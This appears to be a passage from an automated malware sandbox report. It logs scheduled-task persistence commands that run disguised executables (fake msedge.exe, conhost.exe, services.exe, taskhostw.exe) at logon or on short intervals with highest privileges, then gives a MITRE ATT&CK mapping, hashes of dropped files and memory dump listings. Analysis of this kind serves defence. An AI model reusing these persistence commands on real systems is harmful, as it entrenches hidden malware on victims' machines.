schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Defender\de-DE\msedge.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3984

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1072

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Portable Devices\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Videos\taskhostw.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Users\Admin\Videos\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\Videos\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\upfc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3608

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\upfc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1648

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\upfc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2272

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4864

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:780

C:\Users\Admin\AppData\Roaming\sgredgkrtf09weut3r435.exe
C:\Users\Admin\AppData\Roaming\sgredgkrtf09weut3r435.exe
1⤵
PID:4400

C:\Users\Admin\AppData\Roaming\sgredgkrtf09weut3r435.exe
C:\Users\Admin\AppData\Roaming\sgredgkrtf09weut3r435.exe
1⤵
PID:5592

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

PowerShell

Scheduled Task/Job

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Winlogon Helper DLL

Scheduled Task/Job

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Winlogon Helper DLL

Scheduled Task/Job

Scheduled Task

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak
Filesize
9KB

MD5
7050d5ae8acfbe560fa11073fef8185d

SHA1
5bc38e77ff06785fe0aec5a345c4ccd15752560e

SHA256
cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

SHA512
a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23442\VCRUNTIME140.dll
Filesize
96KB

MD5
f12681a472b9dd04a812e16096514974

SHA1
6fd102eb3e0b0e6eef08118d71f28702d1a9067c

SHA256
d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

SHA512
7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23442\_bz2.pyd
Filesize
46KB

MD5
0c13627f114f346604b0e8cbc03baf29

SHA1
bf77611d924df2c80aabcc3f70520d78408587a2

SHA256
df1e666b55aae6ede59ef672d173bd0d64ef3e824a64918e081082b8626a5861

SHA512
c97fa0f0988581eae5194bd6111c1d9c0e5b1411bab47df5aa7c39aad69bfbeca383514d6aaa45439bb46eacf6552d7b7ed08876b5e6864c8507eaa0a72d4334

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23442\_ctypes.pyd
Filesize
57KB

MD5
38fb83bd4febed211bd25e19e1cae555

SHA1
4541df6b69d0d52687edb12a878ae2cd44f82db6

SHA256
cd31af70cbcfe81b01a75ebeb2de86079f4cbe767b75c3b5799ef8b9f0392d65

SHA512
f703b231b675c45accb1f05cd34319b5b3b7583d85bf2d54194f9e7c704fbcd82ef2a2cd286e6a50234f02c43616fbeccfd635aefd73424c1834f5dca52c0931

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23442\_decimal.pyd
Filesize
104KB

MD5
7ba541defe3739a888be466c999c9787

SHA1
ad0a4df9523eeeafc1e67b0e4e3d7a6cf9c4dfac

SHA256
f90efa10d90d940cde48aafe02c13a0fc0a1f0be7f3714856b7a1435f5decf29

SHA512
9194a527a17a505d049161935432fa25ba154e1aee6306dee9054071f249c891f0ca7839de3a21d09b57fdc3f29ee7c4f08237b0dfffafa8f0078cfe464bed3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23442\_hashlib.pyd
Filesize
33KB

MD5
596df8ada4b8bc4ae2c2e5bbb41a6c2e

SHA1
e814c2e2e874961a18d420c49d34b03c2b87d068

SHA256
54348cfbf95fd818d74014c16343d9134282d2cf238329eec2cda1e2591565ec

SHA512
e16aad5230e4af7437b19c3db373b1a0a0a84576b608b34430cced04ffc652c6fb5d8a1fe1d49ac623d8ae94c8735800c6b0a12c531dcdd012b05b5fd61dff2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23442\_lzma.pyd
Filesize
84KB

MD5
8d9e1bb65a192c8446155a723c23d4c5

SHA1
ea02b1bf175b7ef89ba092720b3daa0c11bef0f0

SHA256
1549fe64b710818950aa9bf45d43fe278ce59f3b87b3497d2106ff793efa6cf7

SHA512
4d67306fe8334f772fe9d463cb4f874a8b56d1a4ad3825cff53cae4e22fa3e1adba982f4ea24785312b73d84a52d224dfb4577c1132613aa3ae050a990e4abdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23442\_queue.pyd
Filesize
24KB

MD5
fbbbfbcdcf0a7c1611e27f4b3b71079e

SHA1
56888df9701f9faa86c03168adcd269192887b7b

SHA256
699c1f0f0387511ef543c0df7ef81a13a1cffde4ce4cd43a1baf47a893b99163

SHA512
0a5ba701653ce9755048ae7b0395a15fbb35509bef7c4b4fe7f11dc4934f3bd298bcddbf2a05b61f75f8eb44c4c41b3616f07f9944e0620b031cbe87a7443284

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23442\_socket.pyd
Filesize
41KB

MD5
4351d7086e5221398b5b78906f4e84ac

SHA1
ba515a14ec1b076a6a3eab900df57f4f37be104d

SHA256
a0fa25eef91825797f01754b7d7cf5106e355cf21322e926632f90af01280abe

SHA512
a1bcf51e797ccae58a0b4cfe83546e5e11f8fc011ca3568578c42e20bd7a367a5e1fa4237fb57aa84936eec635337e457a61a2a4d6eca3e90e6dde18ae808025

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23442\_sqlite3.pyd
Filesize
54KB

MD5
d678600c8af1eeeaa5d8c1d668190608

SHA1
080404040afc8b6e5206729dd2b9ee7cf2cb70bc

SHA256
d6960f4426c09a12488eb457e62506c49a58d62a1cb16fbc3ae66b260453c2ed

SHA512
8fd5f0fd5bd60c6531e1b4ad867f81da92d5d54674028755e5680fb6005e6444805003d55b6cbaf4cdad7b4b301cffab7b010229f6fd9d366405b8ade1af72d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23442\_ssl.pyd
Filesize
60KB

MD5
156b1fa2f11c73ed25f63ee20e6e4b26

SHA1
36189a5cde36d31664acbd530575a793fc311384

SHA256
a9b5f6c7a94fb6bfaf82024f906465ff39f9849e4a72a98a9b03fc07bf26da51

SHA512
a8181ffeb3cf8ef2a25357217a3dd05242cc0165473b024cf0aeb3f42e21e52c2550d227a1b83a6e5dab33a185d78e86e495e9634e4f4c5c4a1aec52c5457dca

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23442\base_library.zip
Filesize
1.4MB

MD5
83d235e1f5b0ee5b0282b5ab7244f6c4

SHA1
629a1ce71314d7abbce96674a1ddf9f38c4a5e9c

SHA256
db389a9e14bfac6ee5cce17d41f9637d3ff8b702cc74102db8643e78659670a0

SHA512
77364aff24cfc75ee32e50973b7d589b4a896d634305d965ecbc31a9e0097e270499dbec93126092eb11f3f1ad97692db6ca5927d3d02f3d053336d6267d7e5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23442\blank.aes
Filesize
122KB

MD5
f9d3d67df702b56d749e85a902a6118d

SHA1
823e53d3a2c5f3798cab825950f57d514b39dfb4

SHA256
07d427026d028d40751140700f4eb5876c390ea20028c13a06dc09a6c6e1ff11

SHA512
13066c7c7108bd5d4c311b5f52777534b3329df21b1767b1b3eb0f471d95200cacc705434fb3a8f5c2516d54d927da17ecb2b3a346df85a785249e311b29dffc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23442\libcrypto-1_1.dll
Filesize
1.1MB

MD5
daa2eed9dceafaef826557ff8a754204

SHA1
27d668af7015843104aa5c20ec6bbd30f673e901

SHA256
4dab915333d42f071fe466df5578fd98f38f9e0efa6d9355e9b4445ffa1ca914

SHA512
7044715550b7098277a015219688c7e7a481a60e4d29f5f6558b10c7ac29195c6d5377dc234da57d9def0c217bb3d7feca332a64d632ca105503849f15e057ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23442\libffi-8.dll
Filesize
24KB

MD5
90a6b0264a81bb8436419517c9c232fa

SHA1
17b1047158287eb6471416c5df262b50d6fe1aed

SHA256
5c4a0d4910987a38a3cd31eae5f1c909029f7762d1a5faf4a2e2a7e9b1abab79

SHA512
1988dd58d291ee04ebfec89836bb14fcaafb9d1d71a93e57bd06fe592feace96cdde6fcce46ff8747339659a9a44cdd6cf6ac57ff495d0c15375221bf9b1666e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23442\libssl-1_1.dll
Filesize
203KB

MD5
eac369b3fde5c6e8955bd0b8e31d0830

SHA1
4bf77158c18fe3a290e44abd2ac1834675de66b4

SHA256
60771fb23ee37b4414d364e6477490324f142a907308a691f3dd88dc25e38d6c

SHA512
c51f05d26fda5e995fe6763877d4fcdb89cd92ef2d6ee997e49cc1ee7a77146669d26ec00ad76f940ef55adae82921dede42e55f51bd10d1283ecfe7c5009778

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23442\python311.dll
Filesize
1.6MB

MD5
bb46b85029b543b70276ad8e4c238799

SHA1
123bdcd9eebcac1ec0fd2764a37e5e5476bb0c1c

SHA256
72c24e1db1ba4df791720a93ca9502d77c3738eebf8b9092a5d82aa8d80121d0

SHA512
5e993617509c1cf434938d6a467eb0494e04580ad242535a04937f7c174d429da70a6e71792fc3de69e103ffc5d9de51d29001a4df528cfffefdaa2cef4eaf31

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23442\rar.exe
Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23442\rarreg.key
Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23442\select.pyd
Filesize
24KB

MD5
abf7864db4445bbbd491c8cff0410ae0

SHA1
4b0f3c5c7bf06c81a2c2c5693d37ef49f642a9b7

SHA256
ddeade367bc15ea09d42b2733d88f092da5e880362eabe98d574bc91e03de30e

SHA512
8f55084ee137416e9d61fe7de19e4cff25a4b752494e9b1d6f14089448ef93e15cd820f9457c6ce9268781bd08e3df41c5284801f03742bc5c40b3b81fb798c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23442\sqlite3.dll
Filesize
608KB

MD5
ddd0dd698865a11b0c5077f6dd44a9d7

SHA1
46cd75111d2654910f776052cc30b5e1fceb5aee

SHA256
a9dd0275131105df5611f31a9e6fbf27fd77d0a35d1a73a9f4941235fbc68bd7

SHA512
b2ee469ea5a6f49bbdd553363baa8ebad2baf13a658d0d0c167fde7b82eb77a417d519420db64f325d0224f133e3c5267df3aa56c11891d740d6742adf84dbe4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23442\unicodedata.pyd
Filesize
293KB

MD5
bb3fca6f17c9510b6fb42101fe802e3c

SHA1
cb576f3dbb95dc5420d740fd6d7109ef2da8a99d

SHA256
5e2f1bbfe3743a81b00717011094798929a764f64037bedb7ea3d2ed6548eb87

SHA512
05171c867a5d373d4f6420136b6ac29fa846a85b30085f9d7fabcbb4d902afee00716dd52010ed90e97c18e6cb4e915f13f31a15b2d8507e3a6cfa80e513b6a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nzyvhuhq.4ir.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\AdbWinApi.dll
Filesize
95KB

MD5
ed5a809dc0024d83cbab4fb9933d598d

SHA1
0bc5a82327f8641d9287101e4cc7041af20bad57

SHA256
d60103a5e99bc9888f786ee916f5d6e45493c3247972cb053833803de7e95cf9

SHA512
1fdb74ee5912fbdd2c0cba501e998349fecfbef5f4f743c7978c38996aa7e1f38e8ac750f2dc8f84b8094de3dd6fa3f983a29f290b3fa2cdbdaed691748baf17

Download Submit
C:\Users\Admin\AppData\Roaming\AdbWinUsbApi.dll
Filesize
61KB

MD5
0e24119daf1909e398fa1850b6112077

SHA1
293eedadb3172e756a421790d551e407457e0a8c

SHA256
25207c506d29c4e8dceb61b4bd50e8669ba26012988a43fbf26a890b1e60fc97

SHA512
9cbb26e555ab40b019a446337db58770b9a0c9c08316ff1e1909c4b6d99c00bd33522d05890870a91b4b581e20c7dce87488ab0d22fc3c4bbdd7e9b38f164b43

Download Submit
C:\Users\Admin\AppData\Roaming\adb.exe
Filesize
1.7MB

MD5
884242fb6cbbec1f7711b946ef669e0e

SHA1
7b2bc3c03909e705da759b7c21907683db668cc5

SHA256
65210cb4139672b53acaa2222b1005d036b0b02c437aa47e0e7b616fab0e2f6f

SHA512
c73ed5875dd0a3f0c400794a10336b00602950fa3ff6fb99ce9a772681fb8c5237c5c3cba2d0b7d254e497383d634d3a97342039cc40d295f262c583d0839768

Download Submit
C:\Users\Admin\AppData\Roaming\dllhost.exe
Filesize
3.4MB

MD5
de586ed62cbe8aa67b7d2ea749e37e58

SHA1
3b8f0e80be45995bccd9aad044cf8ceef7fa1fdf

SHA256
041b5ae270b886ab3945f54a4dbdbb0e462ff2e4fa33a3acb0fe8e8d063eff8c

SHA512
57c80030b7524cb868a1afe8a337bbf93c19d9a301b9a28c28a3dee8aca256cf06df3f95cd847dd82e27d6251ff32bcf3d176dfb565ab4c64edc9ee1184d3054

Download Submit
C:\Users\Admin\AppData\Roaming\fastboot.exe
Filesize
833KB

MD5
0875abb1c7b403b3f95631326eafb6c2

SHA1
45faf0c7b005b72145f25186b1a735f282332246

SHA256
d794004af6dfedb5dbf118c20b4fda20ecdb38744191e859f1233287291cf0c7

SHA512
e7749ca3490851c854a036147041c04327203aacd9f9ec6577023ff4adfb9f3ae494baa312dbd12eedce21601ce8a0d2fd20f6f130ed0b2b134ee289db47f09b

Download Submit
C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\1K70CMgSeGxLkKeGse1VkEk.vbe
Filesize
227B

MD5
f2c31772e7c91f2ff0d5a3799216245b

SHA1
7e4229eee244481cc48bf4744cea662676d0b53a

SHA256
fec6e35115ab887bbffc816e64363b321d776f1af26a58e935a54f3568aa437c

SHA512
9f3db7c0ba6ba33840fe00c12a890bbbb9684023129b997d4ae7a986de024086152e1de14f0288fd24de9f8127d82c161c5ccab3e28b22709d249f063ad91ca4

Download Submit
C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\WQrCS9t0V.bat
Filesize
60B

MD5
d55a01e2758ef91cd8ddccc7703517e2

SHA1
0d0d35d7d0007bdc0ddb74feae218b9eb6bb5e56

SHA256
db0c0c5b991e98b03da0dfdc60d3b63af434ef52cf62a523eb28e17f5827f456

SHA512
db9eee55674f8f5639803471159c5373fafddfbab7a36422aa2da05064215f0dd23b6b5772eb936620cf13657944bef9f63d2092cf7cb2c0172ca436fc5fc543

Download Submit
C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\file.vbs
Filesize
34B

MD5
677cc4360477c72cb0ce00406a949c61

SHA1
b679e8c3427f6c5fc47c8ac46cd0e56c9424de05

SHA256
f1cccb5ae4aa51d293bd3c7d2a1a04cb7847d22c5db8e05ac64e9a6d7455aa0b

SHA512
7cfe2cc92f9e659f0a15a295624d611b3363bd01eb5bcf9bc7681ea9b70b0564d192d570d294657c8dc2c93497fa3b4526c975a9bf35d69617c31d9936573c6a

Download Submit
C:\Users\Admin\AppData\Roaming\scvhost.exe
Filesize
61KB

MD5
9db6d927f9fa97d5419f15ee5b633b3d

SHA1
832bdd728fc29bd360a3126da5d48dce3a4ebd31

SHA256
c608942ef98e1dd95df33e11104962e91ea360e01b455fbd666f881afc116526

SHA512
2ec400d834a83dee4d2db4074e72029098a7fe0a5f5913f41d82f32cc53f7cf16c7fd6fb2dbe22f30dd8defaa344390c0b46625594b61c15ee2a727766174275

Download Submit
C:\Users\Admin\AppData\Roaming\setup.exe
Filesize
6.9MB

MD5
e6911d67b1557e060469e3bcbb3f1b26

SHA1
d8e26462769918eccae2ca6c15348f810eb6568e

SHA256
1420115bb23121fd0ab3a7d9a6ba8ddcd4a718724b258c8c214403c070f1cb18

SHA512
b19cfb6214209ce31cf10620f199f03c1c3f344109378e69b05b3651322f13f461232954aafddbe6910887d807126b91258f0902c1e54d3e9f0136cbf265a04d

Download Submit
C:\Users\Admin\AppData\Roaming\sus.bat
Filesize
54B

MD5
7b448e495d5ab244be8065bf0b5491d8

SHA1
1177a30a6aad0ed07295e445b57e23b9bfb0c8f8

SHA256
d9daef7c9edb752480402b9e5499049c92018006bca6d51c26d54b5895699090

SHA512
328f5682b4dd5e872f5d6fe364870375323965fe77915aeb983eb5b833bd413b6b3a4159b4fe88ca772e515cb4c010532ef6d2ad80d7e1fb0ce515564380c3be

Download Submit
C:\Users\Admin\AppData\Roaming\vbs.vbs
Filesize
236B

MD5
fc0095fbf5911c7f6a487621fd3f9f30

SHA1
3ff379b9eee2140cf03ecdc72779eee9adfe95e0

SHA256
0001254296d73292f955d193f8922aada45057ffc5de65e8b983f9c6d1140618

SHA512
88752695000e85a029153b5e368b5e45ed085f35170b7c7888b1ca071889d387d8d437ca40013d1137e333f0d3f04d7709efcc5466cd7a554a2da209e20b4f80

Download Submit
C:\Windows\SoftwareDistribution\Download\SharedFileCache\conhost.exe
Filesize
3.1MB

MD5
7f37a8b5d7f8477374b5b59e9258b0f4

SHA1
5dd21643eab2b7dc44cb58acfb01b94ac1fecf3a

SHA256
acc383151665d737cdedbcd7c639d59063a64b7ce5e622143b92ce7f765551ab

SHA512
70c066075df0450d64acc9eb864e091fe16f081f9f60815fba3967e90f4c86a4c3903c1d88aab54828e60728b71b22abb5eaaf1ffdc29c679991b5574333242c

Download Submit
memory/452-616-0x00007FFC11BB0000-0x00007FFC11BBD000-memory.dmp

Filesize
52KB

Download
memory/452-196-0x00007FFBFC070000-0x00007FFBFC18C000-memory.dmp

Filesize
1.1MB

Download
memory/452-613-0x00007FFC00C00000-0x00007FFC00C23000-memory.dmp

Filesize
140KB

Download
memory/452-614-0x00007FFC00660000-0x00007FFC007D3000-memory.dmp

Filesize
1.4MB

Download
memory/452-615-0x00007FFC15530000-0x00007FFC15549000-memory.dmp

Filesize
100KB

Download
memory/452-159-0x00007FFC00C30000-0x00007FFC00C5D000-memory.dmp

Filesize
180KB

Download
memory/452-610-0x00007FFC161C0000-0x00007FFC161CF000-memory.dmp

Filesize
60KB

Download
memory/452-609-0x00007FFC11BC0000-0x00007FFC11BE4000-memory.dmp

Filesize
144KB

Download
memory/452-608-0x00007FFC15C90000-0x00007FFC15C9D000-memory.dmp

Filesize
52KB

Download
memory/452-512-0x00007FFBFC070000-0x00007FFBFC18C000-memory.dmp

Filesize
1.1MB

Download
memory/452-617-0x00007FFC0D1B0000-0x00007FFC0D1C4000-memory.dmp

Filesize
80KB

Download
memory/452-513-0x00007FFC00C00000-0x00007FFC00C23000-memory.dmp

Filesize
140KB

Download
memory/452-508-0x00007FFBFF020000-0x00007FFBFF0D8000-memory.dmp

Filesize
736KB

Download
memory/452-504-0x00007FFC00660000-0x00007FFC007D3000-memory.dmp

Filesize
1.4MB

Download
memory/452-509-0x00007FFBFD9C0000-0x00007FFBFDD35000-memory.dmp

Filesize
3.5MB

Download
memory/452-499-0x00007FFC11BC0000-0x00007FFC11BE4000-memory.dmp

Filesize
144KB

Download
memory/452-498-0x00007FFC01250000-0x00007FFC01838000-memory.dmp

Filesize
5.9MB

Download
memory/452-507-0x00007FFBFF0E0000-0x00007FFBFF10E000-memory.dmp

Filesize
184KB

Download
memory/452-505-0x00007FFC15530000-0x00007FFC15549000-memory.dmp

Filesize
100KB

Download
memory/452-612-0x00007FFC159E0000-0x00007FFC159F9000-memory.dmp

Filesize
100KB

Download
memory/452-592-0x000001C867CD0000-0x000001C868045000-memory.dmp

Filesize
3.5MB

Download
memory/452-607-0x00007FFBFC070000-0x00007FFBFC18C000-memory.dmp

Filesize
1.1MB

Download
memory/452-604-0x00007FFBFD9C0000-0x00007FFBFDD35000-memory.dmp

Filesize
3.5MB

Download
memory/452-593-0x00007FFC01250000-0x00007FFC01838000-memory.dmp

Filesize
5.9MB

Download
memory/452-603-0x00007FFBFF020000-0x00007FFBFF0D8000-memory.dmp

Filesize
736KB

Download
memory/452-611-0x00007FFC00C30000-0x00007FFC00C5D000-memory.dmp

Filesize
180KB

Download
memory/452-193-0x00007FFC11BB0000-0x00007FFC11BBD000-memory.dmp

Filesize
52KB

Download
memory/452-192-0x00007FFC11BC0000-0x00007FFC11BE4000-memory.dmp

Filesize
144KB

Download
memory/452-191-0x00007FFC0D1B0000-0x00007FFC0D1C4000-memory.dmp

Filesize
80KB

Download
memory/452-187-0x000001C867CD0000-0x000001C868045000-memory.dmp

Filesize
3.5MB

Download
memory/452-180-0x00007FFBFD9C0000-0x00007FFBFDD35000-memory.dmp

Filesize
3.5MB

Download
memory/452-152-0x00007FFC161C0000-0x00007FFC161CF000-memory.dmp

Filesize
60KB

Download
memory/452-177-0x00007FFBFF0E0000-0x00007FFBFF10E000-memory.dmp

Filesize
184KB

Download
memory/452-185-0x00007FFC01250000-0x00007FFC01838000-memory.dmp

Filesize
5.9MB

Download
memory/452-167-0x00007FFC00660000-0x00007FFC007D3000-memory.dmp

Filesize
1.4MB

Download
memory/452-578-0x00007FFC11BC0000-0x00007FFC11BE4000-memory.dmp

Filesize
144KB

Download
memory/452-134-0x00007FFC11BC0000-0x00007FFC11BE4000-memory.dmp

Filesize
144KB

Download
memory/452-115-0x00007FFC01250000-0x00007FFC01838000-memory.dmp

Filesize
5.9MB

Download
memory/452-583-0x00007FFC00660000-0x00007FFC007D3000-memory.dmp

Filesize
1.4MB

Download
memory/452-577-0x00007FFC01250000-0x00007FFC01838000-memory.dmp

Filesize
5.9MB

Download
memory/452-178-0x00007FFBFF020000-0x00007FFBFF0D8000-memory.dmp

Filesize
736KB

Download
memory/452-170-0x00007FFC15530000-0x00007FFC15549000-memory.dmp

Filesize
100KB

Download
memory/452-171-0x00007FFC15C90000-0x00007FFC15C9D000-memory.dmp

Filesize
52KB

Download
memory/452-602-0x00007FFBFF0E0000-0x00007FFBFF10E000-memory.dmp

Filesize
184KB

Download
memory/452-163-0x00007FFC159E0000-0x00007FFC159F9000-memory.dmp

Filesize
100KB

Download
memory/452-164-0x00007FFC00C00000-0x00007FFC00C23000-memory.dmp

Filesize
140KB

Download
memory/1112-0-0x00007FFC06943000-0x00007FFC06945000-memory.dmp

Filesize
8KB

Download
memory/1112-1-0x00000000006B0000-0x00000000013B8000-memory.dmp

Filesize
13.0MB

Download
memory/2124-58-0x0000000000400000-0x00000000004D9000-memory.dmp

Filesize
868KB

Download
memory/2420-211-0x0000016EA4F50000-0x0000016EA4F72000-memory.dmp

Filesize
136KB

Download
memory/2516-53-0x00000000006A0000-0x00000000006B6000-memory.dmp

Filesize
88KB

Download
memory/2912-195-0x000000001C710000-0x000000001C718000-memory.dmp

Filesize
32KB

Download
memory/2912-207-0x000000001C820000-0x000000001C82C000-memory.dmp

Filesize
48KB

Download
memory/2912-166-0x00000000019E0000-0x00000000019EE000-memory.dmp

Filesize
56KB

Download
memory/2912-173-0x00000000019F0000-0x00000000019F8000-memory.dmp

Filesize
32KB

Download
memory/2912-174-0x0000000001A00000-0x0000000001A1C000-memory.dmp

Filesize
112KB

Download
memory/2912-181-0x000000001C460000-0x000000001C4B0000-memory.dmp

Filesize
320KB

Download
memory/2912-182-0x00000000032D0000-0x00000000032D8000-memory.dmp

Filesize
32KB

Download
memory/2912-183-0x000000001C5F0000-0x000000001C606000-memory.dmp

Filesize
88KB

Download
memory/2912-184-0x00000000032E0000-0x00000000032E8000-memory.dmp

Filesize
32KB

Download
memory/2912-186-0x000000001BE40000-0x000000001BE52000-memory.dmp

Filesize
72KB

Download
memory/2912-188-0x000000001C730000-0x000000001C73C000-memory.dmp

Filesize
48KB

Download
memory/2912-200-0x000000001C7A0000-0x000000001C7AC000-memory.dmp

Filesize
48KB

Download
memory/2912-201-0x000000001C7B0000-0x000000001C7B8000-memory.dmp

Filesize
32KB

Download
memory/2912-203-0x000000001CD20000-0x000000001D248000-memory.dmp

Filesize
5.2MB

Download
memory/2912-204-0x000000001C7F0000-0x000000001C7FC000-memory.dmp

Filesize
48KB

Download
memory/2912-161-0x00000000019D0000-0x00000000019DE000-memory.dmp

Filesize
56KB

Download
memory/2912-209-0x000000001C840000-0x000000001C84E000-memory.dmp

Filesize
56KB

Download
memory/2912-95-0x0000000000E80000-0x0000000001198000-memory.dmp

Filesize
3.1MB

Download
memory/2912-208-0x000000001C830000-0x000000001C83A000-memory.dmp

Filesize
40KB

Download
memory/2912-227-0x000000001C860000-0x000000001C868000-memory.dmp

Filesize
32KB

Download
memory/2912-228-0x000000001C870000-0x000000001C878000-memory.dmp

Filesize
32KB

Download
memory/2912-232-0x000000001C880000-0x000000001C88C000-memory.dmp

Filesize
48KB

Download
memory/2912-210-0x000000001C850000-0x000000001C85E000-memory.dmp

Filesize
56KB

Download
memory/2912-205-0x000000001C800000-0x000000001C808000-memory.dmp

Filesize
32KB

Download
